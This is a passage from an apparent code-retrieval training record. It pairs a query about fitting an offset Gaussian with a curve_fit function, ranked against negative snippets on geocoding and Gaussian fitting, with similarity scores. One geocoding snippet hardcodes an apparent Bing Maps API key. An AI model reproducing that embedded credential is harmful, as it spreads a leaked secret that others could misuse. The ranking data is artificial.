'Address Massaging + RLIS'\n\t\t\t\t\td['GSCR'] = mg_dict['Score']\n\t\t\t\t\td['Match_TYPE'] = mg_dict['Match_type']\n\t\t\t\t\td['POINT_X'] = coords[0]\n\t\t\t\t\td['POINT_Y'] = coords[1]\n\n\t\t\t\t\tmanual+=1\n\n\t\t\twrite_row = [v for v in d.values()]\t\n\t\t\tcursor.updateRow(write_row)\n\n\tprint '\\nregocoded: {0}, from manual: {1}'.format(regeo, manual)", "def country() -> str:", "def geocode(location):\n\n\ttxt = fetch_mapzen_response(location)\n\tmydict = parse_mapzen_response(txt)\n\tmydict['query_text'] = location\n\treturn mydict", "def build_search_locations(suburbs=['Balgowlah']):\n\n postcode_file = os.path.join(os.path.join(os.path.dirname(os.path.realpath(__file__)),'..'),'postcodes.csv')\n postcodes = pd.read_csv(postcode_file)\n \n if 'NSW' in suburbs:\n postcodes = postcodes[postcodes['State'] == 'NSW']\n if 'QLD' in suburbs:\n postcodes = postcodes[postcodes['State'] == 'QLD']\n if 'SA' in suburbs:\n postcodes = postcodes[postcodes['State'] == 'SA']\n if 'NT' in suburbs:\n postcodes = postcodes[postcodes['State'] == 'NT']\n if 'ACT' in suburbs:\n postcodes = postcodes[postcodes['State'] == 'ACT']\n if 'WA' in suburbs:\n postcodes = postcodes[postcodes['State'] == 'WA']\n if 'TAS' in suburbs:\n postcodes = postcodes[postcodes['State'] == 'TAS']\n\n if set(suburbs).issubset(['All', 'NSW', 'QLD', 'SA', 'NT', 'ACT', 'WA', 'TAS']):\n suburbs = postcodes['Suburb']\n\n # buld the locations with additional parameters\n searchLocations = {}\n for suburb in suburbs:\n location_df = postcodes[postcodes['Suburb'] == suburb]\n\n if location_df.shape[0] > 0:\n location = {'state': location_df['State'].values[0], \n 'suburb': location_df['Suburb'].values[0], \n 'postcode': location_df['Postcode'].values[0],\n 'includeSurroundingSuburbs': True}\n searchLocations[suburb] = location\n else:\n print (f'{suburb} is not in the list.')\n\n return searchLocations", "def convert_id(text):\n GOOGLE_API_KEY = os.environ['GOOGLE_API_KEY']\n geo = GoogleV3(api_key=GOOGLE_API_KEY)\n location = geo.geocode(place_id=text)\n # remove \", USA\" from end of location\n return location.latitude, location.longitude, location.address[:-5].strip()", "def city_country(city, country):\n city_and_country = city + ', ' + country\n return city_and_country.title()", "def google_geocode(query):\n\tif not API_KEY:\n\t\traise ConfigException(\"Require API_KEY for googleapi. Reload after setting.\")\n\td = {\"address\" : query.encode(\"utf-8\"), \"key\" : API_KEY }\n\tf = urlopen(LOC_URL % (urlencode(d)))\n\tlocdata = load(f)\n\tif f.getcode() == 200:\n\t\tif \"results\" in locdata:\n\t\t\titem = locdata[\"results\"]\n\t\t\tif len(item) == 0:\n\t\t\t\treturn None\n\t\t\titem = item[0]\n\t\t\tll = item.get(\"geometry\", {}).get(\"location\") # lol tricky\n\t\t\tif not ll: return None\n\t\t\treturn item[\"formatted_address\"], ll[\"lat\"], ll[\"lng\"]\n\t\telse:\n\t\t\treturn None\n\telse:\n\t\traise RuntimeError(\"Error (%s): %s\" % (f.getcode(), locdata.replace(\"\\n\", \" \")))", "def address2latlon(addr):\n key = \"AjVyhHv7lq__hT5_XLZ8jU0WbQpUIEUhQ7_nlHDw9NlcID9jRJDYLSSkIQmuQJ82\" # quota de 125 000 requêtes/année\n # b = geocoder.bing([lat, lon], key=key)\n g = geocoder.bing(addr, key=key)\n #g = geocoder.google(addr)\n gjson = g.json\n timeout = time.time() + 7\n while gjson is None: # Redo until we have a response\n g = geocoder.google(addr)\n gjson = g.json\n if time.time() > timeout: # if google can't find the address after a certain amount of time\n sys.exit(\"Google ne trouve pas cette adresse, veuillez réessayer\")\n return g.latlng", "def city_country(city, country):\r\n\treturn(city.title() + ', ' + country.title())", "def COUNTRY_CODE():\n COUNTRY_CODE = \"us/90210\"\n return COUNTRY_CODE", "def clean_address(self, s):\n # The letter \"O\" instead of the numeral \"0\" is a common mistake.\n s = re.sub(\n r\"\\b[A-Z][O0-9][A-Z]\\s?[O0-9][A-Z][O0-9]\\b\", lambda x: x.group(0).replace(\"O\", \"0\"), clean_string(s)\n )\n for k, v in province_or_territory_abbreviations().items():\n # Replace a province/territory name with its abbreviation.\n s = re.sub(\n r\"[,\\n ]+\"\n r\"\\(?\" + k + r\"\\)?\"\n r\"(?=(?:[,\\n ]+Canada)?(?:[,\\n ]+[A-Z][0-9][A-Z]\\s?[0-9][A-Z][0-9])?\\Z)\",\n \" \" + v,\n s,\n )\n # Add spaces between province/territory abbreviation, FSA and LDU and remove \"Canada\".\n return re.sub(\n r\"[,\\n ]+\" r\"([A-Z]{2})\" r\"(?:[,\\n ]+Canada)?\" r\"[,\\n ]+([A-Z][0-9][A-Z])\\s?([0-9][A-Z][0-9])\" r\"\\Z\",\n r\" \\1 \\2 \\3\",\n s,\n )", "def check_born_place(input_string: str) -> tuple:\n c = input_string[0]\n if c == 'A':\n return 'Taipei City', 10\n elif c == 'B':\n return 'Taichung City', 11\n elif c == 'C':\n return 'Keelung City', 12\n elif c == 'D':\n return 'Tainan City', 13\n elif c == 'E':\n return 'Kaohsiung City', 14\n elif c == 'F':\n return 'New Taipei City', 15\n elif c == 'G':\n return 'Yilan County', 16\n elif c == 'H':\n return 'Taoyuan City', 17\n elif c == 'I':\n return 'Chiayi City', 34\n elif c == 'J':\n return 'Hsinchu County', 18\n elif c == 'K':\n return 'Miaoli County', 19\n elif c == 'L':\n return 'Taichung County', 20\n elif c == 'M':\n return 'Nantou County', 21\n elif c == 'N':\n return 'Changhua County', 22\n elif c == 'O':\n return 'Hsinchu City', 35\n elif c == 'P':\n return 'Yunlin County', 23\n elif c == 'Q':\n return 'Chiayi County', 24\n elif c == 'R':\n return 'Tainan County', 25\n elif c == 'S':\n return 'Kaohsiung County', 26\n elif c == 'T':\n return 'Pingtung County', 27\n elif c == 'U':\n return 'Hualien County', 28\n elif c == 'V':\n return 'Taitung County', 29\n elif c == 'W':\n return 'Kinmen County', 32\n elif c == 'X':\n return 'Penghu County', 30\n elif c == 'Y':\n return 'Yangmingshan Management Bureau', 31\n elif c == 'Z':\n return 'Lienchiang County', 33\n else:\n # Should not happen\n return None, None # The return value is a tuple containing two values", "def get_address_by_name(name, limit):\n request = \"{}/{}?key={}&q={}&type=json&limit={}\".format(config.GEOCODE_URL, config.GEOCODE_SEARCH_PATH, config.GEOCODE_KEY, name, limit)\n response = requests.get(request).json()\n return response", "def apply(data, options=default_options, config=default_config, warning=print):\n\n if options[\"reverse\"]:\n\n # convert address to lat,lon\n if not \"address\" in list(data.columns):\n raise Exception(\"reserve address resolution requires 'address' field\")\n data.reset_index(inplace=True) # index is not meaningful\n for retries in range(config[\"retries\"]):\n try:\n pos = geocode(data[\"address\"],\n provider = config[\"provider\"],\n user_agent = config[\"user_agent\"],\n timeout = config[\"timeout\"],\n )\n break\n except Exception as err:\n pos = err\n import time\n time.sleep(config[\"sleep\"])\n if type(pos) is Exception or type(pos) is ModuleNotFoundError:\n raise pos\n data[\"longitude\"] = list(map(lambda p: p.x,pos[\"geometry\"]))\n data[\"latitude\"] = list(map(lambda p: p.y,pos[\"geometry\"]))\n return data\n\n else:\n\n # convert lat,lon to address\n try:\n lats = list(map(lambda x: float(x),data[\"latitude\"]))\n lons = list(map(lambda x: float(x),data[\"longitude\"]))\n pos = list(map(lambda xy: Point(xy),list(zip(lons,lats))))\n except:\n pos = None\n if type(pos) == type(None):\n raise Exception(\"address resolution requires 'latitude' and 'longitude' fields\")\n for retries in range(config[\"retries\"]):\n try:\n addr = reverse_geocode(pos,\n provider = config[\"provider\"],\n user_agent = config[\"user_agent\"],\n timeout = config[\"timeout\"],\n )\n break\n except Exception as err:\n addr = err\n import time\n time.sleep(config[\"sleep\"])\n if type(addr) is Exception or type(addr) is ModuleNotFoundError:\n raise addr\n data[\"address\"] = Series(addr[\"address\"],dtype=\"string\").tolist()\n return data", "def get_address(address: str) -> Tuple[str, str, str]:\n\n # Try to geocode the address as given\n g = geocoder.osm(address)\n\n if g.json is not None:\n\n # TODO this is inefficient and hacky\n\n # First thing we attempt if the result isn't complete is just to\n # add the housenumber (often the issue).\n if not good_geocoder_result(g.json):\n g.json['housenumber'] = usaddress.tag(address)[0]['AddressNumber']\n\n # If the result is now good, return it\n if good_geocoder_result(g.json):\n\n # Geocoding was successful. Return the result\n return (\n # First part is a nicely formatted address\n f\"{g.json['housenumber']} {g.json['street']}, {g.json['city']}, {g.json['state']} {g.json['postal']}\",\n # Second is the latitude\n g.json['lat'],\n # And third is the longitude\n g.json['lng']\n )\n\n # Geocoding was unsuccessful.\n # Let's try to create a cleaner address by first parsing out the pieces we need, then try again.\n \n # Parsing the address components...\n parsed, addr_type = usaddress.tag(address)\n if addr_type != \"Street Address\":\n raise ValueError(f\"Address could not be properly parsed. Resulting type: {addr_type}. Result: \\n{parsed}\")\n \n # Trim off any whitespace from the parsed components.\n for part in parsed:\n parsed[part] = parsed[part].strip()\n\n reqd_address_parts = ['AddressNumber', 'StreetName', 'PlaceName']\n if any(address_part not in parsed for address_part in reqd_address_parts):\n raise ValueError(f\"The address must have at least a house number, street, and city.\")\n \n # Initialize the resulting address string with the address number (aka house/street number)\n new_address = parsed['AddressNumber']\n \n # If the streetname is just a number, make it ordinal\n if parsed['StreetName'].isnumeric():\n parsed['StreetName'] = ordinal(parsed['StreetName'])\n \n # Get the whole street name\n for k, v in [(k, v) for k, v in parsed.items() if k.startswith(\"StreetName\")]:\n new_address += f\" {v}\"\n \n # Add the city...\n new_address += f\", {parsed['PlaceName']}\"\n # Add the state, if it exists\n if 'StateName' in parsed:\n new_address += f\", {parsed['StateName']}\"\n # And the zip code, if it exists\n if 'ZipCode' in parsed:\n new_address += f\" {parsed['ZipCode']}\"\n \n # Now try to geocode this improved address\n g = geocoder.osm(new_address)\n\n if g.json is not None:\n\n # Geocoding was successful. Return the result\n return (\n # First part is a nicely formatted address\n f\"{g.json['housenumber']} {g.json['street']}, {g.json['city']}, {g.json['state']} {g.json['postal']}\",\n # Second is the latitude\n g.json['lat'],\n # And third is the longitude\n g.json['lng']\n )\n \n # Still can't geocode the address. Throw an error\n else:\n raise ValueError(f\"Could not geocode this address: {address}\")", "def get_country_from_coordinates(coordinates):\n geolocator = Nominatim(user_agent=\"random_one\")\n location = geolocator.reverse(coordinates, language='en')\n country = location.address.split(',')[-1].strip()\n return country", "def preprocess(df, combine_list, single_provinces=[\"Hubei\"]):\n \n \"\"\" Mark single regions that are to remain separate\"\"\"\n for single_province in single_provinces:\n df.loc[df[\"Province/State\"]==single_province, \"Country/Region\"] = single_province\n \n \"\"\" Combine rows for other country provinces\"\"\"\n next_index = max(df.index)\n for singlename in combine_list:\n \n \"\"\" Select country\"\"\"\n singlecountry = df.loc[df[\"Country/Region\"]==singlename,:]\n \n \"\"\" Compute sum of provinces\"\"\"\n singlesum = singlecountry.sum(axis=0)\n \n \"\"\" Set other column variables\"\"\"\n singlesum[\"label\"] = singlename\n singlesum[\"Province/State\"] = np.nan\n singlesum[\"Country/Region\"] = singlename\n \n \"\"\" Drop provinces from DataFrame\"\"\"\n df = df.loc[df[\"Country/Region\"]!=singlename,:]\n \n \"\"\"Merge country sum into DataFrame\"\"\"\n singlesum.name = next_index\n next_index += 1\n df = df.append(singlesum)\n\n \"\"\" Rename rest of Mainland China\"\"\"\n df.loc[df[\"Country/Region\"]==\"Mainland China\", \"Country/Region\"] = \"Mainland China w/o Hubei\"\n df.loc[df[\"Country/Region\"]==\"China\", \"Country/Region\"] = \"China w/o Hubei\"\n \n \"\"\" Reset index to region name\"\"\"\n df[\"label\"] = df[\"Country/Region\"]\n df.loc[pd.notna(df[\"Province/State\"]),\"label\"] = df.loc[pd.notna(df[\"Province/State\"]),:][\"Province/State\"]\n df.index = df[\"label\"]\n \n df = df.sort_index()\n \"\"\" Drop unused columns\"\"\"\n df = df.drop(['Province/State', 'Country/Region', 'Lat', 'Long', \"label\"], axis = 1) \n \n \"\"\" Return\"\"\"\n return df", "def return_address_from_location_yelp(location='0,0'):\n if not re.compile('^(\\-?\\d+(\\.\\d+)?),\\s*(\\-?\\d+(\\.\\d+)?)$').match(location):\n raise ValueError('Location Invalid')\n base_url = 'https://maps.googleapis.com/maps/api/geocode/json?'\n latlng = 'latlng=' + location\n try:\n #This try block is for our first 150,000 requests. If we exceed this, use Jack's Token.\n key_string = '&key=' + ACCESS_TOKEN\n url = base_url + latlng + key_string #Builds the url\n print(url)\n result = requests.get(url).json() #Gets google maps json file\n cleaned = result['results'][0]['address_components']\n\n #Address to check against value of check_against_business_location\n chk = cleaned[0]['long_name'] + ' ' + cleaned[1]['long_name'] + ', ' + cleaned[3]['long_name']\n business_tuple = check_against_business_location(location, chk)\n \n if business_tuple[0]: #If true, the lat, lon matches a business location and we return business name\n address_comp = cleaned[0]['long_name'] + ' ' + cleaned[1]['short_name']\n # print(business_tuple[1])\n # print(cleaned[3]['short_name'])\n # print(address_comp)\n return business_tuple[1], cleaned[3]['short_name'], address_comp\n else: #otherwise, we just return the address\n # print(cleaned[0]['long_name'])\n # print(cleaned[1]['short_name'])\n # print(cleaned[3]['short_name'])\n return cleaned[0]['long_name'] + ' ' + cleaned[1]['short_name'] + ', ' + cleaned[3]['short_name']\n except:\n try:\n #Use Jack's Token in case of some invalid request problem with other API Token\n key_string = '&key=' + JACK_TOKEN\n url = base_url + latlng + key_string #Builds the url\n result = requests.get(url).json() #Gets google maps json file\n cleaned = result['results'][0]['address_components']\n #Address to check against value of check_against_business_location\n chk = cleaned[0]['long_name'] + ' ' + cleaned[1]['long_name'] + ', ' + cleaned[3]['long_name']\n business_tuple = check_against_business_location(location, chk)\n if business_tuple[0]: #If true, the lat, lon matches a business location and we return business name\n address_comp = cleaned[0]['long_name'] + ' ' + cleaned[1]['short_name'] \n # print(address_comp)\n # print(business_tuple[1])\n # print(cleaned[3]['short_name'])\n return business_tuple[1], cleaned[3]['short_name'], address_comp\n else: #otherwise, we just return the address\n # print(cleaned[0]['long_name'])\n # print(cleaned[1]['short_name'])\n # print(cleaned[3]['short_name'])\n return cleaned[0]['long_name'] + ' ' + cleaned[1]['short_name'] + ', ' + cleaned[3]['short_name']\n except:\n raise ValueError(\"Something went wrong\")", "def city_country(city, country):\n c_c = '\"' + city + \", \" + country + '\"'\n return c_c.title()", "def geo_by_address(row):\n try:\n # parse the address to separate PHN and street\n parsed = p.address(row['Address'])\n # geocode\n result = g.address(house_number=parsed['PHN'], street_name=parsed['STREET'], borough=row['Borough'])\n lat = result.get(\"Latitude\")\n lon = result.get('Longitude')\n msg = result.get('Message')\n except GeosupportError as ge:\n lat = \"\"\n lon = \"\"\n msg = str(ge)\n return pd.Series([lat, lon, msg])", "def get_lat_lon(data):\n from time import sleep\n from geopy import geocoders\n from geopy.exc import GeocoderTimedOut\n\n gn = geocoders.GeoNames(username='foobar')\n\n cities = get_cities(data).keys()\n\n coords = {}\n for city in cities:\n while True:\n try:\n loc = gn.geocode(city + \", Brazil\")\n except GeocoderTimedOut:\n sleep(2)\n else:\n break\n\n coords[city] = (loc.latitude, loc.longitude)\n\n return coords" ]
[ "0.6251422", "0.6227843", "0.60835624", "0.59131515", "0.585577", "0.5806368", "0.57388103", "0.5738554", "0.5722705", "0.5614146", "0.5594229", "0.55850214", "0.5574379", "0.5574237", "0.5490394", "0.54893243", "0.5472008", "0.5418318", "0.5418175", "0.53998554", "0.5397736", "0.5386239", "0.53849584", "0.5378844", "0.5339769", "0.53364867", "0.5327788", "0.53224933", "0.5322037", "0.5321113", "0.52885896", "0.52755964", "0.5272301", "0.5270091", "0.5260717", "0.5253881", "0.52360845", "0.5216993", "0.52057487", "0.51985604", "0.51971364", "0.5180807", "0.517686", "0.5175928", "0.51748836", "0.5166193", "0.5150535", "0.5145937", "0.5142975", "0.51392704", "0.5133376", "0.5126237", "0.5123751", "0.51184106", "0.5115204", "0.5114417", "0.5113796", "0.51110685", "0.5091969", "0.50846815", "0.50843346", "0.5083156", "0.5079877", "0.50794274", "0.50788146", "0.50779575", "0.5063621", "0.50625247", "0.5058997", "0.5056097", "0.50552326", "0.5050407", "0.5043395", "0.5033377", "0.5021597", "0.5020593", "0.5019379", "0.50177604", "0.50171655", "0.5000316", "0.4999475", "0.49984112", "0.498988", "0.49799815", "0.49793094", "0.49780336", "0.49774754", "0.49760884", "0.49744663", "0.4971502", "0.49704307", "0.49686837", "0.4966119", "0.49658853", "0.49648887", "0.49597067", "0.49575415", "0.49542418", "0.49466604", "0.49287623" ]
0.6954527
0
fit offset gaussian, with offset, amplitude, and sigma constrained to be positive
def fitgauss(bin_edges, counts, guess): """sigma is constrained to be >= one bin width""" """unless guess[3] < 0, then offset set to zero""" bincen = np.zeros(np.size(bin_edges)-1) bincen[:] = bin_edges[0:np.size(bin_edges)-1] binstep = bin_edges[2]-bin_edges[1] bincen += binstep/2 #print(bincen) #print(counts) #plt.plot(bincen, counts, label = 'data') #plt.show() if(guess[3]>0): #allow y_offset coeff, var_matrix = curve_fit(gauss, bincen, counts, guess, bounds=([0,-np.inf, binstep, 0],[np.inf,np.inf, np.inf, np.inf])) [A, mu, sigma, yoff] = coeff else: #force y_offset to be zero - pure gaussian coeff, var_matrix = curve_fit(puregauss, bincen, counts, guess[0:3], bounds=([0,-np.inf, binstep],[np.inf,np.inf, np.inf])) [A, mu, sigma] = coeff yoff = 0.0 c_exp = gauss(bincen, A, mu, sigma, yoff) resid2 = sum((c_exp - counts)**2) #print coeff # print var_matrix #display check #hist_fit=gauss(bincen, *coeff) #plt.plot(bincen, counts, label='data') #plt.plot(bincen, hist_fit, label='fit') #plt.show() return [A, mu, sigma, yoff, resid2]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def gaussian(x, *parameters):\n position, sigma, amplitude, background = parameters\n return amplitude * np.exp(-(x - position)**2 / (2.0 * sigma**2)) + background", "def gaussian(mu, wid, x):\n return np.exp(-((x - mu) / (0.6005612 * wid))**2)", "def Gaussian(x, mu=0, sigma=26.4, A=1, y0=0):\r\n #width = sigma*(2*np.sqrt(2*np.log(2)))\r\n b = 1/(sigma*np.sqrt(2*np.pi))\r\n f = b*np.power(np.e, -(((x-mu)**2)/(2*sigma**2)))\r\n return A*f + y0", "def fitgaussian(self, data):\n params = self.moments(data)\n errorfunction = lambda p: ravel(self.Gauss(*p)(*indices(data.shape)) - data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def gaussian_kernel(training_ex, landmark, sigma=0.1):\n return np.exp(-(np.linalg.norm(training_ex - landmark) ** 2 / (2 * (sigma ** 2))))", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: ravel(gaussian(*p)(*indices(data.shape)) -\n data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def gaussian1d(x, x0, w0, A, offset):\n if w0 == 0:\n return 0\n return A * np.exp(-2 * (x - x0) ** 2 / (w0 ** 2)) + offset", "def gaussian_k(x0, y0, sigma, height, width):\n y = np.arange(0, width, 1, float)\n x = np.arange(0, height, 1, float)[:, np.newaxis]\n return np.exp(-((x - x0) ** 2 + (y - y0) ** 2) / (2 * sigma ** 2))", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: np.ravel(gaussian(*p)(*np.indices(data.shape)) -\n data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: np.ravel(gaussian(*p)(*np.indices(data.shape)) -\n data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def Gaussian(x, mu, sigma, a):\n amplitude = a / ( sigma * np.sqrt(2 * np.pi) )\n u = (x - mu) / sigma\n return amplitude * np.exp( -0.5 * (u**2) )", "def gaussian(x, amplitude=1.0, center=0.0, sigma=1.0):\n \n return (amplitude/(np.sqrt(2.*np.pi)*sigma)) * exp(-np.power((1.0*x-center)/(sigma), 2.)/2.)", "def gaussian(amp, fwhm, mean, x):\n return amp * np.exp(-4. * np.log(2) * (x-mean)**2 / fwhm**2)", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: np.ravel(gaussian(*p)(*np.indices(data.shape)) -\n data)\n p, success = leastsq(errorfunction, params)\n return p", "def fit_gaussian(array):\n\n shape = array.shape\n xmean, ymean = numpy.array(shape) / 2.\n\n xx, yy = numpy.mgrid[:shape[0], :shape[1]]\n\n g_init = astropy.modeling.models.Gaussian2D(amplitude=1., x_mean=xmean, y_mean=ymean,\n x_stddev=1., y_stddev=1.)\n\n f2 = astropy.modeling.fitting.LevMarLSQFitter()\n\n gg = f2(g_init, xx, yy, array)\n\n return gg", "def gaussian(x, mu, sigma):\n return (np.exp(-(x - mu)**2 / 2.0 / sigma**2) /\n np.sqrt(2.0 * np.pi) / sigma)", "def gaussian(pars, x):\n A, b, mu, sigma = pars\n # return b + A/(np.sqrt(2*np.pi)*sigma**2) \\\n return b + A \\\n * np.exp(-.5*(x - mu)**2/sigma**2)", "def gaussian(x, mean, sigma):\n return np.exp(-np.square(x-mean)/(2*np.square(sigma))) / (np.sqrt(2*np.pi*sigma**2))", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: np.ravel(gaussian(*p)(*np.indices(data.shape)) -\n data)\n #p, success = optimize.leastsq(errorfunction, params)\n bnds = (0,30)\n p = optimize.least_squares(errorfunction, params, bounds = bnds).x\n #least square fitting(minimizes raw data and fit)\n return p", "def two_dim_gaussian(xy_mesh, amplitude, xo, yo, sigma_x, sigma_y, offset, theta):\n #DEBUG\n theta = check_theta(theta)\n sigma_x, sigma_y = check_sigma(sigma_x, sigma_y)\n xo, yo = float(xo), float(yo)\n x, y = xy_mesh[0], xy_mesh[1]\n a = (np.cos(theta) ** 2) / (2 * sigma_x ** 2) + (np.sin(theta) ** 2) / (2 * sigma_y ** 2)\n b = -(np.sin(2 * theta)) / (4 * sigma_x ** 2) + (np.sin(2 * theta)) / (4 * sigma_y ** 2)\n c = (np.sin(theta) ** 2) / (2 * sigma_x ** 2) + (np.cos(theta) ** 2) / (2 * sigma_y ** 2)\n res = offset + amplitude * np.exp(- (a * ((x - xo) ** 2) + 2 * b * (x - xo) * (y - yo) + c * ((y - yo) ** 2)))\n #DEBUG print(\"Fitting with: amp = {:.2f}, xo = {:.2f} px, yo = {:.2f} px, sigma_x = {:.2f} px, sigma_y = {:.2f} px, offset = {:.2f} px, theta = {:.2f} deg\".format(amplitude, xo, yo, sigma_x, sigma_y, offset, np.rad2deg(theta)))\n return res.ravel()", "def gaussian(mu, sigma, start, end):\r\n \r\n val = np.linspace(start, end, 100)\r\n a = 1/(sigma*np.pi)\r\n b = - 0.5 * np.power((mu - val)/sigma, 2)\r\n return a*np.exp(b)", "def fit_gaussian(position, energy, dx=0.005, a=2, b=1.5, db=0.01, tolerance=0.05, max_iterations=1000):\n min_energy, max_energy = min(energy), max(energy)\n x_start, x_range = min(position), max(position) - min(position)\n x_gauss = np.arange(0, x_range, dx)\n f_gauss = np.exp(-a * (x_range / 2 - x_gauss) ** 2 + b)\n delta_energy = abs(max(f_gauss) - max_energy)\n b_direction = np.sign(max_energy - max(f_gauss))\n print('E_WHAM: %.3f | E_GAUSS: %.3f | b_direction: %i' % (max_energy, max(f_gauss), b_direction))\n for i in range(max_iterations):\n b = b + b_direction * db\n f_gauss_trial = np.exp(-a * (x_range / 2 - x_gauss) ** 2 + b)\n delta_energy_trial = abs(max(f_gauss_trial) - max_energy)\n if delta_energy_trial < tolerance:\n f_gauss = f_gauss_trial\n print('Found b value: %.2f with dE: %.3f within tolerance in %i iterations' % (b, delta_energy, i))\n break\n elif delta_energy_trial < delta_energy:\n f_gauss = f_gauss_trial\n delta_energy = delta_energy_trial\n print('Finished fitting. %i iterations | dE: %.3f | b_final: %.2f' % (i, delta_energy, b))\n return (x_gauss + x_start, f_gauss)", "def fit_gaussian(self, mask=None):\n data = self.data\n mask = numpy.logical_or(mask, numpy.ma.getmaskarray(data))\n fdata = data[~mask].data\n xdata = numpy.asarray([cm[~mask]\n for cm in self.bset.cmesh]).transpose()\n scale, mean, cov = fit_ndgaussian(xdata, fdata)\n return scale, mean, cov", "def _gaussian_distribution(self, x: ndarray, mu: float, sigma: float) -> ndarray:\n return 1 / (np.sqrt(2 * np.pi) * sigma) * np.exp(\n -np.power(\n (x - mu) / sigma, 2) / 2)", "def gaussian(size,sigma):\n a,b=np.ogrid[-size/2:size/2,-size/2:size/2]\n mask = a**2+b**2\n mask = np.exp(-mask.astype('float')/(2*float(sigma**2)))\n return mask", "def fit_gaussian(arr):\n\tif isinstance(arr, ac.kernels.Kernel):\n\t\tarr = arr.array\n\telif isinstance(arr, np.ndarray):\n\t\tpass\n\telse: \n\t\traise Exception(\"[psfmatch] input needs to be a kernel or array\")\n\n\tnx, ny = arr.shape\n\tx, y = get_xy_grid(nx, ny)\n\n\tmodel_init = am.functional_models.Gaussian2D(amplitude=arr.max(), x_mean=0., y_mean=0., x_stddev=5., y_stddev=5., theta=0.)\n\tfitter = am.fitting.LevMarLSQFitter()\n\n\t# with warnings.catch_warnings():\n\t\t# warnings.simplefilter('ignore')\n\tmodel_best = fitter(model_init, x, y, arr)\n\n\treturn model_best", "def gaussian(x, amp, cen, wid):\n return amp * exp (-(x-cen)**2/(2*wid**2))", "def gaussian_likelihood(x, mu, log_std):\n std = tf.exp(log_std)\n pre_sum = tf.square((x - mu)/std) + 2*log_std + np.log(2*np.pi)\n return -0.5 * tf.reduce_sum(pre_sum, axis=1)", "def initiategaussian(sd, x0):\n y = np.exp(-x**2/(2*sd**2))\n return y", "def gaussian(amp, fwhm, mean):\n return lambda x: amp * np.exp(-4. * np.log(2) * (x-mean)**2 / fwhm**2)", "def set_gaussian(self, X, sigma=0):\n sigma = float(sigma)\n if sigma < 0:\n raise ValueError('sigma should be positive')\n self.set_euclidian(X)\n d = self.weights\n\n if sigma == 0:\n sigma = (d ** 2).mean()\n\n w = np.exp(- (d ** 2) / (2 * sigma))\n self.weights = w", "def gaussian(x, peak_x=.0, sigma=1.0, name=''):\n x = x.astype(np.float)\n variables = {'function': gaussian, 'peak_x': peak_x, 'sigma': sigma}\n y = np.exp((-1 * (x - peak_x)**2) / (2 * sigma**2))\n return packer(x, y, variables, name=name)", "def gauss_kernel(X, test_locs, X_org, test_locs_org, sigma, sigma0, epsilon):\r\n DXT = Pdist2(X, test_locs)\r\n DXT_org = Pdist2(X_org, test_locs_org)\r\n # Kx = torch.exp(-(DXT / sigma0))\r\n Kx = (1 - epsilon) * torch.exp(-(DXT / sigma0) - DXT_org / sigma) + epsilon * torch.exp(-DXT_org / sigma)\r\n return Kx", "def fit_gaussian_1d(image: Image, params_0=None, bounds=None, axis=0):\n arr, arr_e = image.array, image.array_e\n ordinate = arr.mean(axis=axis)\n\n # Now we can generate an array of errors.\n ordinate_e = np.sqrt(np.mean(arr_e**2, axis=axis))\n\n # Setting default values.\n if params_0 is None:\n # Now we generate the initial values for our Gaussian fit.\n # These values are crucial – as this is a high dimensional fitting\n # problem, it is likely that we'll get stuck in a local minimum if these\n # aren't good.\n # Guess that the Gaussian mean is at the most intense mean pixel value.\n mean0 = np.argmax(ordinate)\n # Guess that the standard deviation is a single pixel.\n sdev0 = 1\n # Guess that the background (offset) is the median pixel value.\n offset0 = np.median(ordinate)\n # Guess that the scale is equal to the largest recorded value.\n scale0 = arr.max()\n params_0 = [mean0, sdev0, offset0, scale0]\n if bounds is None:\n bounds = ([0, 0, 0, 0],\n [ordinate.shape[0], ordinate.shape[0], scale0, scale0 * 10])\n\n # Perform the fitting.\n fit_popt_pcov = curve_fit(\n univariate_normal,\n np.arange(0, ordinate.shape[0], 1), ordinate, bounds=bounds,\n sigma=ordinate_e, p0=params_0, maxfev=2000 * (len(params_0) + 1))\n\n fit_info = FitInfo(fit_popt_pcov[0], fit_popt_pcov[1], univariate_normal)\n\n # Determine uncertainty from covarience matrix.\n # Note: the stddev of the fit Gaussian can be accessed via popt[1].\n p_sigma = np.sqrt(np.diag(fit_info.pcov))\n\n return BkgSubInfo(fit_info.popt[2], p_sigma[2], fit_gaussian_1d, fit_info)", "def gaussian(x, amp, wid, cen):\n return amp*np.exp(-(x-cen)**2/(2*wid**2))", "def gaussian(centre, k, intensity, xpos):\r\n\treturn intensity * np.exp(- np.power(k * (xpos - centre), 2))", "def makeGaussian(height, width, sigma=3, center=None):\n x = np.arange(0, width, 1, float)\n y = np.arange(0, height, 1, float)[:, np.newaxis]\n if center is None:\n x0 = width // 2\n y0 = height // 2\n else:\n x0 = center[0]\n y0 = center[1]\n\n return np.exp(-4 * np.log(2) * ((x - x0) ** 2 + (y - y0) ** 2) / sigma ** 2)", "def gaussian(x, sigma):\n try: r = np.exp(-0.5*(x/sigma)**2) \n except: r = np.zeros(len(x))\n return r", "def Gaussian(x,t,sigma):\n return np.exp(-(x-t)**2/(2*sigma**2))", "def womgau(hop):\n import numpy as np\n import logging\n import matplotlib.pyplot as plt\n from scipy.optimize import curve_fit\n from tmath.wombat.womwaverange import womwaverange\n from tmath.wombat.womget_element import womget_element\n from tmath.wombat.inputter import inputter\n from tmath.wombat.inputter_single import inputter_single\n from tmath.wombat.gauss import gauss\n from tmath.wombat.gauss_cont import gauss_cont\n from tmath.wombat.yesno import yesno\n print(' ')\n logging.info('Object is {}'.format(hop[0].obname))\n print(' ')\n print('Spectrum runs from {} to {}'.format(hop[0].wave[0],hop[0].wave[-1]))\n print(' ')\n print('This routine expects the spectrum to be in flambda units.')\n print('It also expects a linear wavelength scale.')\n print(' ')\n print('Choose general region of spectrum\\n')\n nwave,nflux,mode=womwaverange(hop[0].wave,hop[0].flux,'none')\n print('\\nNow pick the exact range for the fit')\n waveint,fluxint,mode=womwaverange(nwave,nflux,mode)\n 